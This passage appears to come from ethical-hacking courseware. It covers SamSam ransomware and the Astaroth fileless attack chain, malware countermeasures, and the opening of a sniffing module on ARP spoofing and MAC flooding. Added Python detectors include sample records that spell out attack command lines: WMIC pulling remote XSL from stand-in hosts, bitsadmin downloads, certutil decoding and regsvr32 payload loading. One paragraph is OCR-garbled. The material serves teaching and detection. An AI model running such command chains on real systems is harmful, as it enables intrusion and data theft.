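        rows.append(f"{ts},4625,10,jdoe,198.51.100.9")
    return "\n".join(rows)


if __name__ == "__main__":
    for ip, first, n, nusers, succ in detect_bruteforce(parse_events(constructed_events())):
        print(f"{ip}: {n} failed remote logons from {first} across {nusers} accounts; "
              f"later success: {succ}")
```

The "later success" field is what turns a noisy alert into an incident: a burst of failures followed by a 4624 from the same source is the pattern that precedes the Mimikatz and lateral-movement stages described above, and it is the line to page on rather than the raw failure count.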

Exploitation Phase
The exploitation phase is illustrated in the figure below:

Figure 7.107: Exploitation phase flow

- Stage 4: Deploys Payload
  After gaining access to all the vulnerable servers in the network, a batch file (.bat) will be executed on all the servers.

  Figure 7.108: Batch Script (.bat) file Deploying SamSam payload (chareter2.exe)

  This custom ransomware .NET binary originally contained two embedded executables: del.exe or delfiletype.exe (Sysinternals SDelete program) and selfdel.exe (used to delete its malicious activity).

  Figure 7.109: SamSam Ransomware Binary

- Stage 5: Executes Payload and Encrypts Local Files
  After executing the binary file, the ransomware performs encryption of the target files matching a hard-coded list of approximately 300 file extensions. Before starting the encryption process, it categorizes the files by size (less than 250 MB, 500 MB, 1000 MB, and larger than 1000 MB) and encrypts the smallest files first. The malware also attempts to unlock files that are in use, presumably to ensure that active documents are encrypted, and to cause maximum damage to the victim.
  Files are encrypted using the Windows Cryptography API with a symmetric-encryption algorithm (Rijndael) key that is randomly generated on the compromised system. The ransomware then encrypts the Rijndael key with an RSA-2048 public key, thereby providing adequate protection from the incident responders' recovery efforts.

  Figure 7.110: Examples of hard-coded target file extensions
Post-Exploitation Phase
- Stage 6: Demands for Ransom
  After encrypting the files of interest, the ransomware launches the Windows SDelete program to wipe the free space on the disk to hinder recovery efforts. The malware also deletes the main ransomware binary and the free space wiper. Then, it deploys another binary to delete all backup files from the local system and any network-accessible drives. When the encryption is complete, the ransomware displays an HTML extortion message (ransom note) on the victim's system, demanding a bitcoin amount for each affected system or a larger amount for all affected systems. The message also specifies a seven-day deadline for payment. The value of the ransom changes every year. The current value of the ransom that the SamSam ransomware is demanding is 3 bitcoins (approximately $41,700) for all systems.

  The creators of SamSam ransomware use a WordPress website to coordinate ransomware payments with the victims. Once the victim pays the ransom, the threat actors provide a download link to a unique XML executable file and the corresponding RSA private key to decrypt the files.

  [Figure: screenshot of the SamSam WordPress payment site, listing the bitcoin amounts demanded per PC and for all keys, with a comment form for victims]

  Sometimes, to avoid attention from law enforcement agencies, threat actors also coordinate ransom payments and communications via websites accessible only from the Tor network.
Fileless Malware Analysis: Astaroth Attack
Astaroth is a fileless malware that has recently become very popular. It completely lives off the land, only running legitimate system tools throughout the lifecycle of the attack. Such an attack includes multiple steps that adopt various fileless techniques to inject malware. The attack starts by sending a spear-phishing email embedded with a malicious link to an LNK file. When the victim double clicks the malicious link, the LNK file initiates the execution of the WMIC tool with the "/format" parameter, which further downloads and executes JavaScript code. This JavaScript code initiates the execution of the Bitsadmin tool to download malicious payloads. All the payloads used in the attack are encoded using Base64 and decoded using the Certutil tool. Only two payloads are decoded, thereby resulting in two DLL files, while the other files remain in the encoded format. Finally, the Regsvr32 tool is used to execute the decoded DLL files, to decode and run other payloads until the Astaroth payload is injected into the Userinit process. Once Astaroth is injected into the process memory, it can steal critical information such as keystrokes and credentials, exfiltrate other data, and send the information to the attacker.
Steps involved in Astaroth Attack:
- Step 1: Sending spear-phishing email
  The attacker sends a specially crafted spear-phishing email embedded with a malicious URL to the victim. The URL contains misleading names such as certidao.htm, abrir_documento.htm, and pedido.htm. When the victim clicks on the link, it automatically redirects the victim to the malicious ZIP archive certidao.htm.zip that includes the certidao.htm.lnk LNK file. When the victim clicks on the ZIP file, it executes an obfuscated BAT command.

- Step 2: Exploiting WMIC
  Step 2.1: The BAT command executed in the previous step runs WMIC.exe as shown below:

  Figure 7.114: Running WMIC.exe

  In the above code, the /format parameter sent to WMIC.exe downloads the v.txt file, an XSL file hosted on a malicious domain. This file has an embedded JavaScript code that is automatically executed by WMIC.exe. Furthermore, the JavaScript code runs WMIC.exe once again.
  Step 2.2: WMIC.exe is executed again as follows:

  Figure 7.115: Running WMIC.exe

  The above code again downloads w.txt, which is an XSL file that contains malicious JavaScript code that exploits system tools such as Bitsadmin, Certutil, and Regsvr32 in the following steps.
- Step 3: Exploiting Bitsadmin
  The Bitsadmin tool is executed multiple times to download additional payloads as follows:

  Figure 7.116: Exploiting Bitsadmin

  The downloaded payloads are encoded using Base64, and their filenames are as follows: falxconxrenwb.~, falxconxrenwxb.~, falxconxrenw64.~, falxconxrenw98.~, falxconxrenwxa.~, falxconxrenwgx.gif, and falxconxrenwg.gif
- Step 4: Exploiting Certutil
  Attackers abuse the Certutil tool to decode the downloaded payloads as follows:

  Figure 7.117: Exploiting Certutil
  Only two files are decoded into the DLL format, while the others remain in the encoded and obfuscated format.
- Step 5: Exploiting Regsvr32
  Now, attackers use the Regsvr32 tool to execute the decoded DLL files using the following command:
  regsvr32 /s falxconxrenw64.~
  falxconxrenw64.~ is a proxy DLL that loads and executes the second DLL file, falxconxrenw98.~. Furthermore, the second DLL initiates the execution of the third DLL retrieved from falxconxrenwxa.~ and falxconxrenwxb.~
- Step 6: Exploiting Userinit
  The third DLL loaded and executed in the previous step reads and decodes falxconxrenwgx.gif into a DLL. This DLL is used to initiate the execution of userinit.exe and injects the decoded DLL. falxconxrenwgx.gif is a proxy DLL that retrieves, decodes, and loads the final DLL falxconxrenwg.gif, called the Astaroth, which is an information stealer.

  Figure 7.118: Demonstration of Astaroth Attack
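Each step of the Astaroth chain above abuses a signed Windows binary with a recognizable command line, so the chain can be matched on process-creation telemetry without any file signature. The Python below is an added example, not code from the courseware or from any product: it applies one rule per step (WMIC with a remote /format XSL, a Bitsadmin transfer, Certutil -decode, Regsvr32 loading a non-.dll name, and userinit.exe spawned by regsvr32 or WMIC) to constructed Sysmon-like records and counts how many distinct stages appear. The domains, paths and benign records are constructed; the payload names are the ones listed in the text, and the three-stage threshold is an assumption.

```python
"""Flag the Astaroth living-off-the-land chain in process-creation telemetry.

Added example; not from the courseware. Records are constructed in a
Sysmon-like (parent_image, image, command_line) form; domains and paths are
constructed, payload names follow the text.
"""
import re
from typing import Callable, Dict, List, Tuple

Record = Tuple[str, str, str]  # (parent_image, image, command_line)


def wmic_remote_format(parent: str, image: str, cmd: str) -> bool:
    """WMIC /format: pointing at a remote XSL (steps 2.1 and 2.2)."""
    return (image.lower() == "wmic.exe"
            and re.search(r"/format\s*:\s*[\"']?https?://", cmd, re.I) is not None)


def bitsadmin_transfer(parent: str, image: str, cmd: str) -> bool:
    """Bitsadmin used as a downloader (step 3)."""
    return image.lower() == "bitsadmin.exe" and re.search(r"/transfer\b", cmd, re.I) is not None


def certutil_decode(parent: str, image: str, cmd: str) -> bool:
    """Certutil decoding a Base64 blob (step 4)."""
    return image.lower() == "certutil.exe" and re.search(r"-decode\b", cmd, re.I) is not None


def regsvr32_non_dll(parent: str, image: str, cmd: str) -> bool:
    """Regsvr32 loading something that does not carry a .dll name (step 5)."""
    if image.lower() != "regsvr32.exe":
        return False
    args = [a for a in cmd.split()[1:] if not a.startswith("/")]
    return any(not a.lower().endswith(".dll") for a in args)


def userinit_from_lolbin(parent: str, image: str, cmd: str) -> bool:
    """userinit.exe started by regsvr32 or WMIC rather than by winlogon (step 6)."""
    return image.lower() == "userinit.exe" and parent.lower() in {"regsvr32.exe", "wmic.exe"}


RULES: Dict[str, Callable[[str, str, str], bool]] = {
    "wmic_remote_xsl": wmic_remote_format,
    "bitsadmin_download": bitsadmin_transfer,
    "certutil_decode": certutil_decode,
    "regsvr32_non_dll": regsvr32_non_dll,
    "userinit_from_lolbin": userinit_from_lolbin,
}


def scan(records: List[Record]) -> List[Tuple[str, str, str]]:
    """Return (rule_name, image, command_line) for every record a rule matches."""
    hits = []
    for parent, image, cmd in records:
        for name, rule in RULES.items():
            if rule(parent, image, cmd):
                hits.append((name, image, cmd))
    return hits


def chain_stages(hits) -> int:
    """Number of distinct chain stages seen; three or more on one host is the
    assumed threshold at which a single-tool false positive becomes unlikely."""
    return len({name for name, _, _ in hits})


TMP = r"C:\Users\Public\Libraries\temporary"   # constructed staging path
SAMPLE_RECORDS: List[Record] = [
    ("cmd.exe", "WMIC.exe", 'WMIC.exe os get /format:"https://storage.example.test/v.txt"'),
    ("WMIC.exe", "WMIC.exe", 'WMIC.exe os get /format:"https://storage.example.test/w.txt"'),
    ("WMIC.exe", "bitsadmin.exe",
     f"bitsadmin /transfer job1 https://cdn.example.test/f.gif {TMP}\\falxconxrenwb.~"),
    ("WMIC.exe", "certutil.exe",
     f"certutil.exe -decode {TMP}\\falxconxrenwb.~ {TMP}\\falxconxrenw64.~"),
    ("WMIC.exe", "regsvr32.exe", f"regsvr32 /s {TMP}\\falxconxrenw64.~"),
    ("regsvr32.exe", "userinit.exe", "userinit.exe"),
    # Benign records that the rules must not flag:
    ("explorer.exe", "WMIC.exe", "wmic os get caption"),
    ("msiexec.exe", "regsvr32.exe", r"regsvr32 /s C:\Vendor\control.dll"),
    ("cmd.exe", "certutil.exe", r"certutil -hashfile C:\Tools\setup.exe SHA256"),
]


if __name__ == "__main__":
    found = scan(SAMPLE_RECORDS)
    for hit in found:
        print(hit)
    print("distinct chain stages:", chain_stages(found))
```

The rules are deliberately narrow (a remote URL after /format, not any WMIC use; a non-.dll argument, not any regsvr32 call) so that the administrative uses of these tools in the benign records stay quiet; correlation across stages on one host is what gives confidence, which is the point of the "detect system tools such as PowerShell and WMIC" countermeasure later in this module.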

Module Flow
[Slide: Malware Concepts | Trojan Concepts | Virus and Worm Concepts | Fileless Malware Concepts | Malware Analysis | Countermeasures | Anti-Malware Software]

Countermeasures
Malware is commonly used by attackers to compromise target systems. Preventing malware from entering a system is far easier than trying to eliminate it from an infected system. This section presents various countermeasures that prevent malware from entering a system and minimize the risk caused by it upon its entry.

Trojan Countermeasures
Some countermeasures against Trojans are as follows:
- Avoid opening email attachments received from unknown senders
- Block all unnecessary ports at the host and use a host firewall
- Avoid accepting programs transferred by instant messaging
- Harden weak default configuration settings and disable unused functionality, including protocols and services
- Monitor the internal network traffic for odd ports or encrypted traffic
- Avoid downloading and executing applications from untrusted sources
- Install patches and security updates for the OS and applications
- Scan external USB drives and DVDs with antivirus software before using them
- Restrict permissions within the desktop environment to prevent installation of malicious applications
- Avoid typing commands blindly and implementing pre-fabricated programs or scripts
- Manage local workstation file integrity through checksums, auditing, and port scanning
- Run host-based antivirus, firewall, and intrusion detection software

Backdoor Countermeasures
Some common countermeasures against backdoors are as follows:
- Most commercial antivirus products can automatically scan and detect backdoor programs before they can cause damage
- Educate users to avoid installing applications downloaded from untrusted Internet sites and email attachments
- Avoid untrusted software and ensure that a firewall protects every device
- Use antivirus tools such as McAfee and Norton to detect and eliminate backdoors
- Track open-source projects that enter the enterprise from untrusted external sources such as open-source code repositories
- Inspect network packets using protocol monitoring tools
- If a computer is found to be infected by backdoors, restart the infected computer in the safe mode with networking
- Run registry monitoring tools to find malicious registry entries added by the backdoor
- Remove or uninstall the program or application installed by the backdoor Trojan or virus
- Remove the malicious registry entries added by the backdoor Trojan
- Delete malicious files related to the backdoor Trojan

Virus and Worm Countermeasures
Some countermeasures against viruses and worms are as follows:
- Install antivirus software that detects and removes infections as they appear
- Generate an antivirus policy for safe computing and distribute it to the staff
- Pay attention to the instructions while downloading files or programs from the Internet
- Regularly update antivirus software
- Avoid opening attachments received from unknown senders, as viruses spread via e-mail attachments
- Since virus infections can corrupt data, ensure that you perform regular data backups
- Schedule regular scans for all drives after the installation of antivirus software
- Do not accept disks or programs without checking them first using a current version of an antivirus program
- Ensure that any executable code used within the organization has been approved
- Do not boot the machine with an infected bootable system disk
- Stay informed about the latest virus threats
- Check DVDs for virus infection
- Ensure that pop-up blockers are turned on and use an Internet firewall
- Perform disk clean-up and run a registry scanner once a week
- Run anti-spyware or anti-adware once a week

- Do not open files with more than one file-type extension
- Be cautious with files sent through instant messenger applications
Fileless Malware Countermeasures
Some countermeasures against fileless malware attacks are as follows:
- Remove all the administrative tools and restrict access through Windows Group Policy or Windows AppLocker
- Disable PowerShell and WMI when not in use
- Disable macros and use only digitally signed trusted macros
- Install whitelisting solutions such as McAfee Application Control to block unauthorized applications and code running on your systems
- Train employees to detect phishing emails and to never enable macros in MS Office documents
- Disable PDF readers to run JavaScript automatically
- Disable Flash in the browser settings
- Implement two-factor authentication to access critical systems or resources connected to the network
- Implement multi-layer security to detect and defend against memory-resident malware
- Use User Behavior Analytics (UBA) solut
ions to detect threats hidden within your data
- Ensure the ability to detect system tools such as PowerShell and WMIC, and whitelisted application scripts against malicious attacks
- Run periodic antivirus scans to detect infections and keep the antivirus program updated
- Install browser protection tools and disable automatic plugin downloads
- Schedule regular security checks for applications and regularly patch the applications
- Regularly update the OS with the latest security patches
- Examine all the running programs for any malicious or new signatures and heuristics
- Enable endpoint security with active monitoring to protect networks when accessed remotely
- Examine the indicators of compromise on the system and the network
- Regularly check the security logs, especially when excessive amounts of data leave the network
- Restrict admin rights and provide the least privileges to the user level to prevent privilege escalation attacks
- Use application control to prevent Internet browsers from spawning script interpreters such as PowerShell and WMIC
- Carefully examine the changes in the system's usual behavior patterns compared with the baselines
- Use next-generation antivirus (NGAV) software that employs advanced technology such as ML (machine learning) and AI (artificial intelligence) to avoid new polymorphic malware
- Use baseline and search for known tactics, techniques, and procedures (TTPs) used by many adversarial groups
- Ensure that you use Managed Detection and Response (MDR) services that can perform threat hunting
- Ensure that you use tools such as Blackberry Cylance and Microsoft Enhanced Mitigation Experience Toolkit to combat fileless attacks
- Disable unused or unnecessary applications and service features
- Uninstall applications that are not important
- Block all the incoming network traffic or files with the .exe format

Module Flow
[Slide: Malware Concepts | Trojan Concepts | Virus and Worm Concepts | Fileless Malware Concepts | Malware Analysis | Countermeasures | Anti-Malware Software]

Anti-Malware Software
An attacker uses malware to commit online fraud or theft. Thus, the use of anti-malware software is recommended to help detect malware, remove it, and repair any damage it might cause. This section lists and describes various anti-malware (anti-Trojan and antivirus) software programs.

Anti-Trojan Software
Anti-Trojan software is a tool or program that is designed to identify and prevent malicious Trojans or malware from infecting computer systems or electronic devices. Anti-Trojan tools may employ scanning strategies as well as freeware or licensed tools to detect Trojans, rootkits, backdoors, and other types of potentially damaging software.
- Kaspersky Internet Security
  Source: https://www.kaspersky.com
  Kaspersky Internet Security protects devices from various types of intrusions due to Trojans, viruses, spyware, ransomware, phishing, and dangerous websites. It securely stores passwords for easy access on PC, Mac, and mobile. It makes backup copies of photos, music, and files and also encrypts data on PC. Furthermore, it automatically blocks inappropriate content and helps you manage the use of social networks. In addition, it provides extra security when you shop or bank online on PC or Mac.

  Figure 7.119: Screenshot of Kaspersky Internet Security

Some additional anti-Trojan software are as follows:
- McAfee® LiveSafe™ (https://www.mcafee.com)
- Symantec Norton Security Premium (https://www.symantec-norton.com)
- Bitdefender Total Security (https://bitdefender.com)
- HitmanPro (https://www.hitmanpro.com)
- Malwarebytes (https://www.malwarebytes.org)
- Zemana Antimalware (https://www.zemana.com)
- Emsisoft Anti-Malware Home (https://www.emsisoft.com)
- Malicious Software Removal Tool (https://www.microsoft.com)
- SUPERAntiSpyware (https://www.superantispyware.com)
- Plumbytes Anti-Malware (https://plumbytes.com)

Antivirus Software
It is essential to update antivirus tools to monitor the data passing through a system. Such tools may follow specific or generic methods to detect viruses. Generic methods look for virus-like performance rather than a specific virus. These tools do not specify the virus type but warn the user of a possible virus infection. Generic methods can raise false alarms; hence, they do not perform well in terms of detecting precise virus forms. Specific methods look for known virus signatures in the antivirus database and ask the user to choose the necessary action to be taken, such as repair and delete. It is a good practice for organizations to install the most recent version of the antivirus software and regularly update it to keep up with the introduction of new viruses in the market. Updating of antivirus software by the respective vendors is a continuous process.
- Bitdefender Antivirus Plus 2019
  Source: https://www.bitdefender.com
  Bitdefender Antivirus Plus 2019 works against all threats, from viruses, worms, and Trojans to ransomware, zero-day exploits, rootkits, and spyware. It uses a technique called behavioral detection to closely monitor active apps. As soon as it detects suspicious activity, it takes decisive action to prevent infection. It sniffs and blocks malicious websites that masquerade as trustworthy websites to steal financial data such as passwords or credit card numbers.

  Figure 7.120: Screenshot of Bitdefender Antivirus Plus 2019

Some additional antivirus software are as follows:
- ClamWin (http://www.clamwin.com)
- Kaspersky Anti-Virus (https://www.kaspersky.com)
- McAfee AntiVirus Plus (https://home.mcafee.com)
- Norton AntiVirus Basic (https://www.norton.com)
- Avast Premier Antivirus (https://www.avast.com)
- ESET Internet Security (https://www.eset.com)
- AVG Antivirus FREE (https://free.avg.com)
- Avira Antivirus Pro (https://www.avira.com)
- Trend Micro Maximum Security (https://trendmicro.com)
- Panda Antivirus Pro (https://www.pandasecurity.com)
- Webroot SecureAnywhere Antivirus (https://www.webroot.com)
Fileless Malware Detection Tools
Various tools used to detect fileless malware threats on endpoint devices and systems are discussed below:
- AlienVault® USM Anywhere™
  Source: https://www.alienvault.com
  AlienVault® USM Anywhere™ provides a unified platform for threat detection, incident response, and compliance management. It centralizes security monitoring of networks and devices in the cloud, on premises, and at remote locations, thereby helping you to detect threats virtually anywhere.

  Figure 7.121: Screenshot of AlienVault® USM Anywhere™

Some additional tools for detecting fileless malware threats are as follows:
- Quick Heal Total Security (http://www.quickheal.com)
- Endpoint Detection and Response (EDR) (https://www.trendmicro.com)
- DefenderCheck (https://github.com)
- FCL (https://github.com)
- CYNET 360 (https://www.cynet.com)
Fileless Malware Protection Tools
Various tools used to protect systems, networks, and other devices connected to the network from fileless malware threats are discussed below:
- McAfee End Point Security
  Source: https://www.mcafee.com
  McAfee End Point Security is a security tool used by security professionals to perform threat detection, investigation, and response activities. It helps security analysts quickly prioritize threats and minimize potential disruption. It is essential for antivirus protection, exploit prevention, firewall implementation, and web control communication between systems.

  Figure 7.122: Screenshot of McAfee End Point Security

Some additional fileless malware protection tools are as follows:
- Microsoft Defender Advanced Threat Protection (https://docs.microsoft.com)
- Kaspersky End Point Security for Business (https://www.kaspersky.com)
- Trend Micro Smart Protection Suites (https://www.trendmicro.com)
- Norton 360 with LifeLock Select (https://us.norton.com)
- REVE Antivirus (https://www.reveantivirus.com)

Module Summary
This module presented the concepts of malware and their propagation techniques. It also discussed the concepts of APT and its lifecycle. Furthermore, it described the concepts of Trojans, their types, and how they infect systems. In addition, it described the concepts of viruses, their types, and how they infect files as well as the concepts of computer worms. Moreover, it explained the concepts of fileless malware and how they infect files. It also illustrated how to perform static and dynamic malware analysis and described various techniques to detect malware. Furthermore, it presented various measures against Trojans, backdoors, viruses, and worms. Finally, it ended with a detailed discussion on various anti-Trojan and antivirus tools.
In the next module, we will discuss in detail how attackers as well as ethical hackers and pen-testers use sniffing to collect information about a target of evaluation.

Module 08: Sniffing
Module Objectives
This module starts with an overview of sniffing concepts and provides an insight into MAC, DHCP, ARP, MAC spoofing, and DNS poisoning attacks. Later, the module discusses various sniffing tools, countermeasures, and detection techniques.
At the end of this module, you will be able to:
- Describe sniffing concepts
- Explain different MAC attacks
- Explain different DHCP attacks
- Describe ARP poisoning
- Explain different MAC spoofing attacks
- Describe DNS poisoning
- Apply a defense mechanism against various sniffing techniques
- Use different sniffing tools
- Apply various sniffing countermeasures
- Apply various techniques to detect sniffing attacks

Module Flow
[Slide: module flow diagram]

Sniffing Concepts
This section describes network sniffing and threats, how a sniffer works, active and passive sniffing, how an attacker hacks a network using sniffers, protocols vulnerable to sniffing, sniffing in the data link layer of the Open Systems Interconnection (OSI) model, hardware protocol analyzers, Switched Port Analyzer (SPAN) ports, wiretapping, and lawful interception.

Network Sniffing
Packet sniffing is the process of monitoring and capturing all data packets passing through a given network using a software application or hardware device. Sniffing is straightforward in hub-based networks, as the traffic on a segment passes through all the hosts associated with that segment. However, most networks today work on switches. A switch is an advanced computer networking device. The major difference between a hub and a switch is that a hub transmits line data to each port on the machine and has no line mapping, whereas a switch looks at the Media Access Control (MAC) address associated with each frame passing through it and sends the data to the required port. A MAC address is a hardware address that uniquely identifies each node of a network.
An attacker needs to manipulate the functionality of the switch to see all the traffic passing through it. A packet sniffing program (also known as a sniffer) can capture data packets only from within a given subnet, which means that it cannot sniff packets from another network. Often, any laptop can plug into a network and gain access to it. Many enterprises' switch ports are open. A packet sniffer placed on a network in promiscuous mode can therefore capture and analyze all the network traffic. Sniffing programs turn off the filter employed by Ethernet network interface cards (NICs) to prevent the host machine from seeing other stations' traffic. Thus, sniffing programs can monitor all traffic.
Although most networks today employ switch technology, packet sniffing is still useful. This is because installing remote sniffing programs on network components with heavy traffic flows such as servers and routers is relatively easy. It allows an attacker to observe and access the entire network traffic from one point. Packet sniffers can capture data packets containing sensitive information such as passwords, account information, syslog traffic, router configuration, DNS traffic, email traffic, web traffic, chat sessions, and FTP passwords. This

Modul
8 1079
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
allowsan attackerto read passwords i n cleartext,
the actualemails, creditcard numbers,
financialtransactions, etc. It alsoallowsan attackerto sniff SMTP, POP, IMAP traffic,IMAP,
HTTPBasic, telnet authentication, SQLdatabase, SMB,NFS, andFTPtraffic. An attackercan gain
a substantialamount of informationbyreading captureddata packets; then,the attackercan
use thatinformation to break into the network.An attacker carries out more effectiveattacks
bycombining thesetechniques with active transmission,
The following diagram depicts an attacker sniffing the data packets between two legitimate network users:

Figure 8.1: Packet sniffing scenario

How a Sniffer Works
The most common way of networking computers is through an Ethernet connection. A computer connected to a local area network (LAN) has two addresses: a MAC address and an Internet Protocol (IP) address. A MAC address uniquely identifies each node in a network and is stored on the NIC itself. The Ethernet protocol uses the MAC address to transfer data to and from a system while building data frames. The data link layer of the OSI model uses an Ethernet header with the MAC address of the destination machine instead of the IP address. The network layer is responsible for mapping IP network addresses to the MAC address as required by the data link protocol. It initially looks for the MAC address of the destination machine in a table, usually called the Address Resolution Protocol (ARP) cache. If there is no entry for the IP address, an ARP broadcast of a request packet goes out to all machines on the local sub-network. The machine with that particular address responds to the source machine with its MAC address. The source machine's ARP cache adds this MAC address to the table. The source machine then uses this MAC address in all its communications with the destination machine.
There are two basic types of Ethernet environments, and sniffers work differently in each. These two types are:
- Shared Ethernet
In a shared Ethernet environment, a single bus connects all the hosts that compete for bandwidth. In this environment, all the other machines receive packets meant for one machine. Thus, when machine 1 wants to talk to machine 2, it sends a packet out on the network with the destination MAC address of machine 2, along with its own source MAC address. The other machines in the shared Ethernet (machines 3 and 4) compare the frame's destination MAC address with their own and discard the unmatched frame. However, a machine running a sniffer ignores this rule and accepts all the frames. Sniffing in a shared Ethernet environment is passive and, hence, difficult to detect.
- Switched Ethernet
In a switched Ethernet environment, the hosts connect with a switch instead of a hub. The switch maintains a table that tracks each computer's MAC address and the physical port on which that MAC address is connected, and then delivers packets destined for a particular machine. The switch is a device that sends packets to the destined computer only; furthermore, it does not broadcast them to all the computers on the network. This results in better utilization of the available bandwidth and improved security. Hence, the process of putting a machine NIC into promiscuous mode to gather packets does not work. As a result, many people think that switched networks are secure and immune to sniffing. However, this is not true.

Although a switch is more secure than a hub, sniffing the network is possible using the following methods:
- ARP Spoofing
ARP is stateless. A machine can send an ARP reply even without asking for it; furthermore, it can accept such a reply. When a machine wants to sniff the traffic originating from another system, it can ARP spoof the gateway of the network. The ARP cache of the target machine will have an incorrect entry for the gateway. Thus, all the traffic destined to pass through the gateway will now pass through the machine that spoofed the gateway MAC address.
- MAC Flooding
Switches maintain a translation table that maps various MAC addresses to the physical ports on the switch. As a result, they can intelligently route packets from one host to another. However, switches have a limited memory. MAC flooding makes use of this limitation to bombard switches with fake MAC addresses until the switches can no longer keep up. Once this happens to a switch, it will enter fail-open mode, wherein it starts acting as a hub by broadcasting packets to all the ports on the switch. Once that happens, it becomes easy to perform sniffing. macof is a utility that comes with the dsniff suite and helps the attacker to perform MAC flooding.
Once a switch turns into a hub, it starts broadcasting all packets it receives to all the computers in the network. By default, promiscuous mode is turned off in network machines; therefore, the NICs accept only those packets that are addressed to a user's machine and discard the packets sent to the other machines. A sniffer turns the NIC of a system to promiscuous mode so that it listens to all the data transmitted on its segment. A sniffer can constantly monitor all the network traffic to a computer through the NIC by decoding the information encapsulated in the data packets. Attackers configure the NIC in their machines to run in promiscuous mode so that the card starts accepting all the packets. Thus, the attacker can view all the packets that are being transmitted in the network.

Figure 8.2: Working of a sniffer

Types of Sniffing
Attackers run sniffers to convert the host system's NIC to promiscuous mode. As discussed earlier, the NIC in promiscuous mode can then capture packets addressed to the specific network. There are two types of sniffing. Each is used for different types of networks. The two types are:
- Passive sniffing
- Active sniffing
Passive Sniffing
Passive sniffing involves sending no packets. It simply captures and monitors the packets flowing in the network. A packet sniffer alone is not preferred for an attack because it works only in a common collision domain. A common collision domain is the sector of the network that is not switched or bridged (i.e., connected through a hub). Common collision domains are present in hub environments. A network that uses hubs to connect systems uses passive sniffing. In such networks, all hosts in the network can see all the traffic. Hence, it is easy to capture traffic through the hub using passive sniffing.

Figure 8.3: Passive sniffing

Attackers use the following passive sniffing methods to gain control over a target network:
- Compromising physical security: An attacker who succeeds in compromising the physical security of a target organization can walk into the organization with a laptop and try to plug into the network and capture sensitive information about the organization.
- Using a Trojan horse: Most Trojans have in-built sniffing capability. An attacker can install these on a victim's machine to compromise it. After compromising the victim's machine, the attacker can install a packet sniffer and perform sniffing.
Most modern networks use switches instead of hubs. A switch eliminates the risk of passive sniffing. However, a switch is still vulnerable to active sniffing.

Note: Passive sniffing provides significant stealth advantages over active sniffing.

Active Sniffing
Active sniffing searches for traffic on a switched LAN by actively injecting traffic into it. Active sniffing also refers to sniffing through a switch. In active sniffing, the switched Ethernet does not transmit information to all the systems connected through the LAN as it does in a hub-based network. For this reason, a passive sniffer is unable to sniff data on a switched network. It is easy to detect these sniffer programs and highly difficult to perform this type of sniffing. Switches examine data packets for source and destination addresses and then transmit them to the appropriate destinations. Therefore, it is cumbersome to sniff switches. However, attackers can actively inject ARP traffic into a LAN to sniff around a switched network and capture the traffic. Switches maintain their own ARP cache in Content Addressable Memory (CAM). CAM is a special type of memory that maintains a record of which host is connected to which port. A sniffer records all the information visible on the network for future review. An attacker can see all the information in the packets, including data that should remain hidden.
To summarize the types of sniffing: passive sniffing does not send any packets; it only monitors the packets sent by others. Active sniffing involves sending out multiple network probes to identify access points.
The following is a list of different active sniffing techniques:
- MAC flooding
- DNS poisoning
- ARP poisoning
- DHCP attacks
- Switch port stealing
- Spoofing attack

How an Attacker Hacks the Network Using Sniffers
Attackers use sniffing tools to sniff packets and monitor network traffic on a target network. The steps that an attacker follows to make use of sniffers to hack a network are illustrated below.
Step 1: An attacker who decides to hack a network first discovers the appropriate switch to access the network and connects a system or laptop to one of the ports on the switch.

Figure 8.4: Discovering a switch to access the network

Step 2: An attacker who succeeds in connecting to the network tries to determine network information such as the topology of the network by using network discovery tools.

Figure 8.5: Using network discovery tools to learn topology

Step 3: By analyzing the network topology, the attacker identifies the victim's machine to target his/her attacks.

Figure 8.6: Identifying the victim's machine

Step 4: An attacker who identifies a target machine uses ARP spoofing techniques to send fake (spoofed) Address Resolution Protocol (ARP) messages.

Figure 8.7: Attacker sending fake ARP message

Step 5: The previous step helps the attacker to divert all the traffic from the victim's computer to the attacker's computer. This is a typical man-in-the-middle (MITM) type of attack.

Step 6: Now, the attacker can see all the data sent and received by the victim.

Figure 8.8: Redirecting the traffic to the attacker

The attacker can now extract sensitive information from the packets, such as passwords, usernames, credit card details, and PINs.

Figure 8.9: Attacker extracting sensitive information
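As an added example (not from the book), the following monitor shows the defender's view of the ARP spoofing used in steps 4 and 5 and in the gateway-spoofing method described earlier: it decodes raw ARP payloads and reports the symptoms a poisoned cache leaves behind. The hosts, addresses and the five-packet capture are constructed for the example.

```python
"""Detect ARP cache poisoning symptoms from raw ARP payloads.
Constructed example; not code from the book. Flags:
  - replies nobody asked for (ARP is stateless, so hosts accept them),
  - an IP whose MAC changes (critical when it is the gateway),
  - one MAC claiming several IPs (the spoofer keeps its own IP too)."""
import struct
from dataclasses import dataclass, field

ARP_REQUEST, ARP_REPLY = 1, 2
ARP_FMT = "!HHBBH6s4s6s4s"          # Ethernet/IPv4 ARP payload, 28 bytes
ZERO_MAC = "00:00:00:00:00:00"


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def ip_str(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def build_arp(opcode, sender_mac, sender_ip, target_mac, target_ip) -> bytes:
    """Serialise an ARP payload; only used here to build the sample capture."""
    def mac(s): return bytes.fromhex(s.replace(":", ""))
    def ip(s): return bytes(int(o) for o in s.split("."))
    return struct.pack(ARP_FMT, 1, 0x0800, 6, 4, opcode,
                       mac(sender_mac), ip(sender_ip), mac(target_mac), ip(target_ip))


def parse_arp(payload: bytes) -> dict:
    """Decode the fixed ARP header; reject anything that is not Ethernet/IPv4."""
    htype, ptype, hlen, plen, op, smac, sip, tmac, tip = struct.unpack(
        ARP_FMT, payload[:struct.calcsize(ARP_FMT)])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("not an Ethernet/IPv4 ARP packet")
    return {"op": op, "smac": mac_str(smac), "sip": ip_str(sip),
            "tmac": mac_str(tmac), "tip": ip_str(tip)}


@dataclass
class ArpMonitor:
    gateway_ip: str
    table: dict = field(default_factory=dict)    # ip -> mac, as the hosts would learn it
    pending: set = field(default_factory=set)    # IPs a request has been seen for
    alerts: list = field(default_factory=list)

    def _learn(self, ip: str, mac: str) -> None:
        if ip == "0.0.0.0":                       # ARP probe: carries no binding
            return
        known = self.table.get(ip)
        if known is not None and known != mac:
            level = "CRITICAL" if ip == self.gateway_ip else "WARNING"
            self.alerts.append(f"{level}: {ip} moved from {known} to {mac}")
        self.table[ip] = mac
        claimed = sorted(i for i, m in self.table.items() if m == mac)
        if len(claimed) > 1:
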